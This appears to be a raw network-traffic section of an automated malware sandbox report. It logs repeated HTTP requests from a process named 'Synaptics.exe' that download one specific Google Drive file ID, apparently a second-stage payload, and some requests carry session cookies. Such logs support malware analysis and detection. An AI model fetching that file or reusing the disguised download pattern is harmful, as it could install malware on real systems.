                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Yuz7RKwQEmloTaTTA976nrnkFQ7N5Ob3pnCam2NVZl0sB_Ud02smlILDTDMmhSw5alN9qYua8UwJYg8uP4GqMg-ydOrOsxWCz2mBh0SXqRIaBniutRP5BkN5ceAVzF4EhGF6V34nDgJ3XudT8SM4aVp_Cp4zGI-RnpiVAHIlijow4CMrQ_jiekk
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Yuz7RKwQEmloTaTTA976nrnkFQ7N5Ob3pnCam2NVZl0sB_Ud02smlILDTDMmhSw5alN9qYua8UwJYg8uP4GqMg-ydOrOsxWCz2mBh0SXqRIaBniutRP5BkN5ceAVzF4EhGF6V34nDgJ3XudT8SM4aVp_Cp4zGI-RnpiVAHIlijow4CMrQ_jiekk
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=e0MMv7cRp-grNJHjXrhAU_LA_LGSTbCZR5NB_desh_k7u6ozgnbyf-rkVtUkhybO-lKzptPcJJZjB-xAJNIFGwk0KWu6Y9PwmuNL9n0wmFo0cAoquhAgWdfbz5KTJ_SR5jmhs53G5hp-aFYyyktNAAdNZkhq4RLUKINiF2gb5PdPOd-hORFA-PF-
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=e0MMv7cRp-grNJHjXrhAU_LA_LGSTbCZR5NB_desh_k7u6ozgnbyf-rkVtUkhybO-lKzptPcJJZjB-xAJNIFGwk0KWu6Y9PwmuNL9n0wmFo0cAoquhAgWdfbz5KTJ_SR5jmhs53G5hp-aFYyyktNAAdNZkhq4RLUKINiF2gb5PdPOd-hORFA-PF-
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=e0MMv7cRp-grNJHjXrhAU_LA_LGSTbCZR5NB_desh_k7u6ozgnbyf-rkVtUkhybO-lKzptPcJJZjB-xAJNIFGwk0KWu6Y9PwmuNL9n0wmFo0cAoquhAgWdfbz5KTJ_SR5jmhs53G5hp-aFYyyktNAAdNZkhq4RLUKINiF2gb5PdPOd-hORFA-PF-
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=e0MMv7cRp-grNJHjXrhAU_LA_LGSTbCZR5NB_desh_k7u6ozgnbyf-rkVtUkhybO-lKzptPcJJZjB-xAJNIFGwk0KWu6Y9PwmuNL9n0wmFo0cAoquhAgWdfbz5KTJ_SR5jmhs53G5hp-aFYyyktNAAdNZkhq4RLUKINiF2gb5PdPOd-hORFA-PF-
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=e0MMv7cRp-grNJHjXrhAU_LA_LGSTbCZR5NB_desh_k7u6ozgnbyf-rkVtUkhybO-lKzptPcJJZjB-xAJNIFGwk0KWu6Y9PwmuNL9n0wmFo0cAoquhAgWdfbz5KTJ_SR5jmhs53G5hp-aFYyyktNAAdNZkhq4RLUKINiF2gb5PdPOd-hORFA-PF-
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=e0MMv7cRp-grNJHjXrhAU_LA_LGSTbCZR5NB_desh_k7u6ozgnbyf-rkVtUkhybO-lKzptPcJJZjB-xAJNIFGwk0KWu6Y9PwmuNL9n0wmFo0cAoquhAgWdfbz5KTJ_SR5jmhs53G5hp-aFYyyktNAAdNZkhq4RLUKINiF2gb5PdPOd-hORFA-PF-
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=e0MMv7cRp-grNJHjXrhAU_LA_LGSTbCZR5NB_desh_k7u6ozgnbyf-rkVtUkhybO-lKzptPcJJZjB-xAJNIFGwk0KWu6Y9PwmuNL9n0wmFo0cAoquhAgWdfbz5KTJ_SR5jmhs53G5hp-aFYyyktNAAdNZkhq4RLUKINiF2gb5PdPOd-hORFA-PF-
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=e0MMv7cRp-grNJHjXrhAU_LA_LGSTbCZR5NB_desh_k7u6ozgnbyf-rkVtUkhybO-lKzptPcJJZjB-xAJNIFGwk0KWu6Y9PwmuNL9n0wmFo0cAoquhAgWdfbz5KTJ_SR5jmhs53G5hp-aFYyyktNAAdNZkhq4RLUKINiF2gb5PdPOd-hORFA-PF-
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=e0MMv7cRp-grNJHjXrhAU_LA_LGSTbCZR5NB_desh_k7u6ozgnbyf-rkVtUkhybO-lKzptPcJJZjB-xAJNIFGwk0KWu6Y9PwmuNL9n0wmFo0cAoquhAgWdfbz5KTJ_SR5jmhs53G5hp-aFYyyktNAAdNZkhq4RLUKINiF2gb5PdPOd-hORFA-PF-
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=e0MMv7cRp-grNJHjXrhAU_LA_LGSTbCZR5NB_desh_k7u6ozgnbyf-rkVtUkhybO-lKzptPcJJZjB-xAJNIFGwk0KWu6Y9PwmuNL9n0wmFo0cAoquhAgWdfbz5KTJ_SR5jmhs53G5hp-aFYyyktNAAdNZkhq4RLUKINiF2gb5PdPOd-hORFA-PF-
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
